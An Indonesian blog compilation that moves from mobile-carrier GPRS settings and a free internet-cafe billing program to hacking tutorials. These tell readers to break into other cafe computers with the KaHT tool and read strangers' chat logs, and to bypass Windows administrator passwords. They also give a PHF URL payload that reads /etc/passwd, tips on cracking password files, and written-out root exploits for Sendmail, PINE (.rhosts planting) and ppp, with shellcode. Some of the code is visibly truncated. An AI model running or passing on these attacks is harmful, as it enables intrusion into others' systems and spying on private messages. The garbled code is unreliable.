Prompt Password : No
Password : wap123
Authentication : Normal
Gateway IP address : 10.1.89.130
Homepage : http://wap.telkomsel.com

Connection Security : Off
Session Mode : Permanent
1. Kecuali untuk kartu IM3, penyetingan GPRS atau MMS memerlukan proses aktivasi terlebih
dahulu.
2. Proses aktivasi dilakukan dengan cara menghubungi operator yang bersangkutan sesuai kartu
yang digunakan.
3. Mengenai cara melakukan aktivasi secara detil dapat dilihat pada detil penyetingan GPRS di
bawah ini.
Setting GPRS Matrix / Mentari
Profile Name : satelindo
Homepage URL : http://wap.matrix-centro.com

IP Address : 202.152.162.250:9200
Bearer : GPRS
User Name :
Password :
APN : satelindogprs.com
Three
GPRS Settings
Settings’ Name: 3-GPRS
Homepage : http://wap.three.co.id/

Proxies : Enable
Proxy address : 10.4.0.10
Port : 3128
GPRS access point : 3gprs
Authentication type : Normal
Login type : Automatic
Username : 3gprs
Password : 3gprs
MMS Settings
Settings’ name : 3-MMS
Homepage : http://mms.hutch.co.id/

GPRS access point : 3mms
Authentication type : Normal
Username : 3mms
Password : 3mms
Allow adverts : No

Billing Warnet Gratis.

17.26

Sumber: http://www.kipas.info/billing-warnet-gratis.html

Buat yang punya usaha warnet ataupun rental komputer pasti memerlukan software
billing untuk memudahkan pencatatan penagihan ke user. Ada banyak billing warnet
yang dijual di pasaran. Namun untuk memilikinya kita harus merogoh kocek terlebih
dahulu. Bagi Anda yang memiliki dana terbatas kenapa tidak mencoba software billing
gratis buatan indomog. Software buatan anak negeri ini memiliki feature yang tidak
kalan lengkap di banding software billing berbayar.
Free Billing warnet dengan tampilan flash yang menarik lebih secure dan dapat
diandalkan dapat bersaing dengan program billing warnet lainnya yang lebih mahal.
MOG Billing System merupakan, software perhitungan biaya dan tarif yang
diperuntukkan untuk bidang usaha warnet, game online, rental komputer dan lain-lain.
MOG Billing System didistribusikan secara gratis (100% free) dengan fitur-fitur yang
lengkap sesuai dengan kebutuhan bisnis, MOG Billing System mampu bersaing dengan
billing system lain yang harganya jauh lebih mahal.
Berikut beberapa fitur software billing IndoMOG
Member
· Prepaid Member
· Packet member
· Voucher Member
· Personal Member
Tarif dan Biaya
· Bisa di konfigurasi secara dinamis sesui dengan kebutuhan
· Ada generate Voucher dan Paket
· Tarif Based on Minute
· Tarif Based on Time (Happy Hour)
· Setting Packet & Voucher
Remote Tools
· Shutdown Client
· Lock Client & Lock All Client
· Windows Lock Client
· Logout Client
· Send Message &Chatting
· Transfer Client
· Time Warning
· Active Watch Client
· Log User
· Send Warning
· Restart Client
Report
· Report total pendapatan per tahun/bulan/hari
· Report per user/operator
· Report voucher & packet
Point Of Sales
· Product List
· Purchasing
· Selling
· Purchasing report
· Sales Report
· Billing of Sales Report
· Stock in Report
Software Billing
sumber : Indomog

Trik melihat isi chatting teman dari Warnet

17.21

Artikel ini sudah aku temukan beberapa bulan yang lalu..Tapi baru beberapa hari kemarin dicoba and ternyata berhasil..aku mencobanya dengan 2 komputer dirumah yang terhubung dalam Network...
aku akan coba berikan triknya disini.Tapi sebelum melakukan trik ini ada beberapa syarat yang harus dipenuhi..
1.Menguasai MS-DOS dengan baik atau mengerti sedikit...karena dalam melakukan trik ini kita akan bermain main dalam MS_DOS
2.Punya logika yang cepat dan dapat mengetik dengan cepat
Sekarang kita mulai triknya..pertama tama kamu harus punya program khusus hacker,namanya KaHT(KaHt.exe) kamu bisa download programnya disini
Program ini berfungsi menerobos masuk ke computer server atau client.setelah kamu mendownload program tersebut,extracklah program tesebut pake winzip..Jika dalam Windows anda ada antivirus,biasanya antivirus akan mendeteksinya sebagai trojan..abaikan saja.program yang kedua adalah internet maniac(Internet Maniac.exe) download disinprogram ini berfungsi untuk mengetahui IP computer
masuk ke computer melalui start-search-computer or people-a computer on the network lalu klik search..maka akan muncul daftar komputer yang terkoneksi dalam jaringanatau kalo mau lebih cepat klik my network place/Network neighboure.pilih salah satu komputer yang akan kamu jadikan sasaran.Catat No IPnya.kemudian jalankan program internet maniac untuk mendapatkan nomor IP berikutnyamasuk ke Host Loockup,lalu ketikkan nama komputer dan resolve.maka dengan segera kamu mendapatkan nomor IP computer tersebut.catat no IP sebelum di deteck pake internet maniac dan sebelum di deteck pake internet maniac.berikutnya jalankan program KaHT..kamu hanya dapat menhjalankannya dalam MS-DOS..masuk ke MS_DOS(start-accessories-ComandPrompt)
Setelah berhasil masuk ke dalam program KaHT,masuk kedalam directory lalu ketikkan sebagai berikut..jika tadi kamu mengextracnya di C maka ketik "CD\KaHTkemudian ketik KaHTno IP awal sebelum di deteck no IP sesudah di detectmisalnya Sebelum didetect=193.172.0.2sesudah di detect=193.172.0.3 maka yang harus kamu ketikKaHT193.172.0.2 193.172.0.3 lalu enter
jika port 135 ternyata dalam keadaan terbuka.maka secara otomatis anda sudah berada dikomputer korban tepatnya berada di c\windows\system milik komputer korban.sebenarnya sekarang kamu sudah bisa mengedit,ataupun menghapus data yang ada didalam komputer..(jangan dilakukan)kamupun bisa mengakali billing warnet..masuk aja kedalam billing server..untuk melihat isi chattingan orang lain..cari aja program MIRC.biasanya ada di C\program files\MIRC.buka file MIRC.INI,lalu log IRC di on kan saja.masuk ke C\program files\MIRC\Logs.nanti disitu ada file file Log hasil chattingan dia...

Jebol Password Administrator XP/Vista

11.41

sebener nya untuk windows 2000/98 jg bisa,tp kyk e udah nga jaman deh kecuali buat server kali yak!

ya udah pertama-tama langkahyang kita lakukan ada membaca Bismillahirohmanirohim (wajib)
1. restart computer
2. Tekan F8 (sehingga boot di safe mode)
3. Pilih Save Mode
4. begitu masuk di Login Page…..
5. Login: Administrator (ingat tulisan seperti ini bukan administrator - a huruf kecil, tapi A huruf besar)
6. Password : …. (kosongin aja)
7. Tekan ENTER

8. masuk ke control panel
9. masuk /klik ke user
10. pilih User Administrator
11. pilih “Change Password”

atau juga bisa

ALT+CTRL+DEL+ENTER sampe 10x masukkan sembarang passnya

Webhack password

11.35

Mungkin dari Anda sudah banyak yang menjadi UNIX hacker ( kalo gw sih newbie, tapi yg sok tau ), tapi bagi yang sering hacking lewat windows ada baiknya mencobanya. Metodologi atau terminology atau anatomi atau cara singkatnya (qe..qe..qe Sok mantap bahasa lo lay J) yang ada :

Mendapatkan Password melalui FTP
Teknik PHF
Telnet dan Exploits

OK langsung saja J

Mendapatkan Password

Cara termudah mendapatkan akses superuser dapat melalui akses ftp ke sebuah webpage. Tentunya kamu juga harus mengerti isi dari file password.

root:User:d7Bdg:1n2HG2:1127:20:Superuser

AkedaBagus:p5Y(h0tiC:1229:20:Akeda Bagus,:/usr/people/akedabagus:/bin/csh

MTong:EUyd5XAAtv2dA:1129:20:Malih Tong:/usr/people/mtong:/bin/csh

Ini merupakan contoh password file yang terenkripsi. Bagian yang perlu diperhatikan adalah :

root:x:0:1:Superuser:/:

ftp:x:202:102:Anonymous ftp:/u1/ftp:

ftpadmin:x:203:102:ftp Administrator:/u1/ftp

Berikut ini contoh lain dari file password, ini memiliki sedikit perbedaan, yaitu apa yg dikenal shadow. Yup file ini ter-shadow. File yg ter-shadow menyebabkan file tidak dapat dilihat atau dicopy seperti password terenkripsi biasanya. Contoh dari file password yang dishadow :

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh

daemon:x:1:1:0000-Admin(0000):/:

bin:x:2:2:0000-Admin(0000):/usr/bin:

sys:x:3:3:0000-Admin(0000):/:

adm:x:4:4:0000-Admin(0000):/var/adm:

lp:x:71:8:0000-lp(0000):/usr/spool/lp:

smtp:x:0:0:mail daemon user:/:

uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:

nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico

listen:x:37:4:Network Admin:/usr/net/nls:

nobody:x:60001:60001:uid no body:/:

noaccess:x:60002:60002:uid no access:/:

webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh

pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false

ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

file tershadow mempunyai “x” di tempat password tsb atau terkadang tersamarkan oleh *.

Setelah mengenal sedikit password file, dan mudah-mudahan dengan mudah dapat mengidentifikasinya. Sekarang kita beranjak ke cara untuk meng-cracknya.

Mengcrack password tidaklah sesulit apa yang kita bayangkan, walaupun jenis file berbeda-beda dari beberapa system. Langkah pertama yang dilakukan adalah mendownload atau mengcopy file tsb. Langkah selanjutnya mencari password cracker atau dictionary maker ( sesuaikan dengan jenis file yg Anda dapat ). Dimana nyarinya ? …hmm biasakan mencari dahulu dengan search engine seperti google. Atau bisa juga ke astalavista, di sini ada search engine buat nyari tool hacking. Sebagai referensi penulis hanya menggunakan cracker tool seperti : Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Lalu untuk dictionary maker atau dictionary file… Ketika kita ( Kita ..? Lo aja sendiriJ ) memulai mengcrack sebuah program, maka kita akan ditanyakan untuk menemukan password file. Itulah fungsi dictionary maker. Kamu dapat mendownload di situs hacker yang bertebaran. Dictionary maker dapat bekerja pada kombinasi huruf dengan alphabet yang dapat kita pilih ( ASCII, huruf besar, huruf kecil serta angka ). Lalu mulailah mengcrack sesuai perintah yang diberikan dari tool-tool tsb.

Teknik PHF

Kebanyakan orang telah mengetahui teknik ini dan kebanyakan server telah menemukan bug ini dan telah memperbaikinya. Namun tak ada salahnya mencantumkannya sebagai referensi.

Phf teknik merupakan cara termudah ( Sok tau… sorry gw juga newbie J) mendapatkan password. Untuk melakukannya hanya buka browser dan dan ketik :

http://nama_webpage/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Ganti nama_webpage dengan domain. Jadi jika kamu mencoba mendapatkan file pasword dari www.akeda.com ketik:

http://www.akeda.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Yeah Cuma gitu! Santai dan copy filenya(jika masih jalan lo... Yach L).

Telnet dan Exploits

Sebenarnya inilah cara terbaik ( menurut gw ) menghack webpages, tapi agak sulit dibandingkan meggunakan ftp atau phf. Sebelum mensetup exploit, kamu harus ada telnetnya. Exploits memberitahu sistem jika ada error atau bug dan biasanya bekerja untuk mendapatkan akses root. Banyak sekali jenis exploits bertebaran di internet.

Exploit ini dikenal dengan nama Sendmail v.8.8.4, ini akan membuat program suid /tmp/x atau shell root. Cara mensetupnya :

cat <<>/tmp/x.c

#define RUN "/bin/ksh"

#include

main()

{

execl(RUN,RUN,NULL);

}

_EOF_

cat <<>/tmp/spawnfish.c

main()

{

execl("/usr/lib/sendmail","/tmp/smtpd",0);

}

_EOF_

cat <<>/tmp/smtpd.c

main()

{

setuid(0); setgid(0);

system("chown root /tmp/x ;chmod 4755 /tmp/x");

}

_EOF_

gcc -O -o /tmp/x /tmp/x.c

gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c

gcc -O3 -o /tmp/smtpd /tmp/smtpd.c

/tmp/spawnfish

kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`

rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c

sleep 5

if [ -u /tmp/x ] ; then

echo "leet..."

/tmp/x

dan sekarang exploit lainnya. Saya akan menjelaskan pine exploit melalui linux. Dengan melihat tabel proses dengan ps untuk melihat user mana yang lagi menjalankan PINE, lalu ls /tmp/ untuk memperoleh nama lockfile untuk setiap user. Lihat lagi tabel proses, maka sekarang akan tampak setiap user yg keluar PINE atau kehabisan space pesan di inboxnya, secara efektif akan menghapus setiap lockfile.

Buatlah sebuah link ke /tmp/.hamors_lockfile to ~hamors/.rhosts(umumnya begini) akan menyebabkan PINE membuat ~harmors/.rhosts sebagai file 666 dengan PINE proses id didalamnya. Atau simpelnya echo "+ +" > /tmp/.hamors_lockfile, lalu rm /tmp/.hamors_lockfile.

* Berikut ini cuplikan dari Sean B. Hamor ... Dalam contoh ini harmor sebagai korban, sedangkan catluvr attackernya.

hamors (21 19:04) litterbox:~> pine

catluvr (6 19:06) litterbox:~> ps -aux | grep pine

catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine

hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine

catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors

- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4

catluvr (8 19:07) litterbox:~> ps -aux | grep pine

catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4

hamors (23 19:09) litterbox:~> pine

catluvr (11 19:10) litterbox:~> ps -aux | grep pine

catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine

hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine

catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4

+ +

catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

Yang terakhir gw kasihtau adalah script exploit untuk ppp yng vulner. Kacaukan dengan angka jika tak dapat bekerja. Ini cara mensetupnya :

#include

#define BUFFER_SIZE 156 /* size of the bufer to overflow */

#define OFFSET -290 /* number of bytes to jump after the start

of the buffer */

long get_esp(void) { __asm__("movl %esp,%eax\n"); }

main(int argc, char *argv[])

{

char *buf = NULL;

unsigned long *addr_ptr = NULL;

char *ptr = NULL;

char execshell[] =

"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */

"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */

"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */

"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */

int i,j;

buf = malloc(4096);

/* fill start of bufer with nops */

i = BUFFER_SIZE-strlen(execshell);

memset(buf, 0x90, i);

ptr = buf + i;

/* place exploit code into the buffer */

for(i = 0; i <>

*ptr++ = execshell[i];

addr_ptr = (long *)ptr;

for(i=0;i < (104/4); i++)

*addr_ptr++ = get_esp() + OFFSET;

ptr = (char *)addr_ptr;

*ptr = 0;

setenv("HOME", buf, 1);

execl("/usr/sbin/ppp", "ppp", NULL);

}

Setelah mendapat akses root, sebaiknya lo ganti passwordnya sebelum menghapus atau mengganti sesuatu. Untuk mengganti account mereka login via telnet dengan account barumu. Ketik passwd, lalu akan menanyakan password baru yang akan kau ganti.

by:

Akeda Bagus Jully Setiasgi. Lahir di Bekasi, 13 Juli 1984. Manamatkan SMU di SMUN 2 Bekasi. Saat ini penulis sedang menyelesaikan kuliah S1 di Gunadarma jurusan Sistem Komputer. Lagi getol-getolnya sama musik jazz, sehingga banyak menghabiskan waktunya bersama guitar. Hobi beratnya ya main gitar, piano dan ngoprek komputer. Saat ini sedang mendalami pemrograman di Linux.

Informasi lebih lanjut tentang penulis bisa didapat melalui:

Email: akeda_bagus@telkom.net